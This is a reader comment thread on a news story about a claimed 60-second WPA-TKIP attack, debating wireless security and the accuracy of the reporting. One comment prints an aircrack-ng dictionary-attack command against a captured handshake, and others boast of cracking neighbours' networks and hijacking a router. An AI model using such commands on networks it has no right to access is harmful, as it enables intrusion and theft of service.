back to article WPA keys gone in 60 seconds

Networking nerds claim to have devised a way of breaking Wi-Fi Protected Access (WPA) encryption within 60 seconds. The technique, developed by Toshihiro Ohigashi of Hiroshima University and Masakatu Morii of Kobe University, is based on the established Becks-Tews method, which involves making minor changes to packets …

COMMENTS

This topic is closed for new posts.
  1. Anonymous Coward
    Flame

    Oh dear

    Everyone switch to WPA2 - we don't want another Hiroshima!

  2. northern monkey
    Thumb Up

    impressive

    I can't even type in the key in 60 seconds!!

  3. Stuart Halliday
    Flame

    Duh

    Anyone stupid enough to be using WPA or even for a manufacturer to include it in the Routers list of options deserves all they get....

  4. Tom Chiverton 1
    Boffin

    Note top of page 9 in the PDF

    Note top of page 9 in the PDF: The attack only works if you can act as a repeater to the access point i.e. the client isn't in range of the AP. This isn't very likely is it ? And if you are acting as a repeater, why not just use (the same SSID with) no password as most clients will just silently connect to you and you can MiM their traffic conventionally ?

  5. MattyB
    Boffin

    Another Reason.....

    Why I will be running Cat6 around my next house when we come to decorate each room.

    Wireless is incredibly unreliable on my home network, and powerline has allowed my downstairs neighbor access to my uPnP server as the "encyrption" included with the powerline adapters is XP/Vista only and my uPnP server is on my NAS.

    Although I must admit, I'm much more excited than the missus about the prospect of a fully distributed gigabit LAN.

  6. adnim

    A dictionary attack

    against WPA2-CCMP works providing one can capture the handshake and the password is a dictionary word. So WPA2 is not secure either. Don't use a dictionary word PSK to secure a WLAN ever. It took me less than 5 seconds to retrieve the PSK for my WLAN (avalon), I did however have to put my nonsensical PSK into my dictionary/wordlist.

    :~$ aircrack-ng -a 2 -e avalon -w ./dict/wordlist ./dump01-01.cap

    So simple even I could do it.

  7. Anonymous Coward
    Happy

    Excuse

    My internet connection downloaded that? You must be mistaken. Someone must have hacked my WPA.

    It's on my computer? Well they transferred it once they'd done the hack.

    Anon, in case this actually happens to me, as I really don't download anything I shouldn't.

  8. Bilgepipe
    Gates Horns

    @Stuart Halliday

    It's easy to call people stupid for using weak security, but with routers and access points being sold in Tescos as commodity equipment, people assume that you just plug it in and use it, just like your TV. The router manufacturers are a great deal more culpable than the users are stupid.

  9. Anonymous Coward
    Grenade

    Shame its Not WGA thats Gone..

    That is all

  10. ChrisC Silver badge
    Thumb Down

    @Stuart Halliday

    I'm sure there are quite a few wifi users out there who *know* their setups aren't as secure as they could/should be, but simply don't have the spare cash to upgrade all of their wireless-enabled devices to ones that can support WPA2.

  11. Misha Gale
    Thumb Down

    Not a key stealing attack?

    OK, I'm neither an expert on cryptography or network security, that's why I read the dumbed-down versions on El Reg, but something doesn't seem quite right here. AFAIK, the Beck-Tewes attack is able to intercept and modify small packets of data, *not* obtain the key to a network, two very different things. And apparently this new attack does the same thing, only faster.

    So how are "WPA keys gone in 60 seconds"? This is a serious attack, but this article seems to be exaggerating somewhat.

    As I said before, I'm not an expert, and I'd be happy for someone to explain to me that I'm wrong.

  12. Brett 1
    FAIL

    If Wireless networks are so quick and easy to hack

    Then why when I am stuck somewhere with no internet access can't i just quickly spend 10-15 mins running some tools to hack their network and then start using the internet. I have yet to see anybody demonstrate to me how I can do this using easily available and configurable tools.

    B

  13. Anonymous Coward
    Anonymous Coward

    @Bilgepipe

    I have to agree with bilgpipe on this, in fact the whole way in which computers and associated equipment is sold is more the cause of the the problems with security than thick end users. Manufacturers of of hardware and software (I'm looking at you Microsoft) are selling their products under the premise that all you have to know is how to plug it in, like a washing machine; when this is plainly not the case.

  14. Anonymous Coward
    Boffin

    It's not only end users who are stupid!

    I work for a large IT Company. Not small and not red. I got a brand new laptop last week and guess what. I have had to configure the guest account on my wireless network for WPA so as to be able to connect to the network with my new company laptop.

    Ok so the company data is protected by VPN but hell, even my mum could run an IT department better than this bunch.

  15. Blacklight

    What about AES?

    So does this touch AES, or only TKIP?

    Due to some legacy devices, some networks run WPA2 with WPA fallback, and may be exposing themselves, but only if they're running TKIP?

  16. Anonymous Coward
    Paris Hilton

    Re: Brett 1

    I agree. I have yet to see, or hear of for that matter, a wireless hack/crack that is able to be perpretrated by someone other than a security expert or at least someone very familiar with network security and also Linux.

    Until I see a freely or commercially available program that will let the guy next door do this at the click of a button (or six), this is a non-issue unless you are worried about corporate espionage. And if you ARE worried about corporate espionage... why the fusk are you using a wireless network?

    Paris because she allows a hell of a lot more access than a WPA secured router.

  17. Anonymous Coward
    Happy

    @AC

    You can run the IT department better? Step up to the job before whining about it.

    Regards,

    The 'Large IT Company' IT Manager.

  18. Anonymous Coward
    Linux

    re: Easily available tools

    Hate to break it to everyone who thinks these techniques aren't free and easily available. There are live CDs designed to do just this. Take a look at BackTrack sometime. A freely downloadable distribution centered just around penetration testing. All it takes is little Johnny with his laptop to start taking apart your wireless network.

    And before anyone even begins to say that the tools are too difficult for anyone to use, it takes all of five seconds to Google for a step-by-step, paint-by-numbers, connect-the-dots guide for cracking wireless networks using the tools. Hell, YouTube has videos you can watch, if reading simple guides is too hard.

    Yes, this stuff is everywhere.

  19. Anonymous Coward
    FAIL

    Get real ...

    ... unless your living in a city, or a large town, where geeks frequently war drive, or unless you suspect your nearest neigbours are uber geeks, for the love of sensibility, get a grip already.

    I'm not advocating ignoring this kinda thing, but lets get real, most people have a slim to none chance of having their wireless hacked into, even on WEP.

  20. Chris 211

    @The 'Large IT Company' IT Manager.

    Face it, IT Company's haven't a clue. What you want is a proper certified network engineer. Any fool who can install XP seams to call himself an IT consultant.

    WPA like WEP before it is better then nothing and of course WPA2 with its AES encryption is the recommended. Anyway, wireless is good for nothing more then easy access casual browsing and little else. People seam to have forgotten wireless is a shared medium like hubs and nobody uses a hub these days do they?

    Oh and can low end AP manufacturers add a power setting and get end users to set it then a while street wont be competing for RF bandwidth! Also means the hackers would have to sit on your front door!

  21. Anonymous Coward
    Pirate

    driveby 4tw...

    as someone who has on occasion done a bit of drive by web access out of hours in times gone by.

    i can confirm that them dumb AP's that blast out thier signal at max strength with a range of 100m+, sure are a boon to those of us who cannot afford to be camped out directly on the owners doorstep just to get a bit of RPG/web action.

    oh and a multi-boot netbook is more than enough to do the hunting and key breaking in linux and RPG avatar web abuse in m$....

    Yarrrr,,,,,,

  22. M Gale
    Paris Hilton

    eh..

    As far as I'm aware even ye olde WPA is only fast to crack if you use dictionary words. Make your password something obfuscated and you shouldn't have a problem unless the people cracking your network happen to have brought a lawd-knows-how-many-nodes Beowulf with them, surely?

    Paris, because she knows all about unsecured access.

  23. Anonymous Coward
    Pirate

    Re: Brett 1

    A novice couldn't do it, but the only reason for that is it has not been pre-packaged into an easy to use GUI for Windows. If someone did that then people would be under a lot more pressure to use more secure methods.

    I know very little about how the methods work, but I managed to hack three of my neighbours and steal their internets (and also took control of the router admin so that I could open some ports for my torrents - BT Home Hub had loads of vulnerabilites).

    I used aircrack-ng, which is a command line tool for Linux that basically does it all for you, although it doesn't hold your hand. It took a bit of working out, but there are tutorials out there.

    People think they are safe but you don't know who your neighbour is. It might be me.

  24. Bibulous
    Thumb Down

    WRONG

    Read the paper - neither this nor Beck-Tews can recover WPA keys. You can falsify ARP packets, which is fairly significant but a world away from recovering the key and being able to read all traffic in clear. "37% of WPA-TKIP encrypted ARP can be read and falsified in best case time of 60 seconds" is very different to the message that the media has portrayed. Disappointing reporting!!

This topic is closed for new posts.

Other stories you might like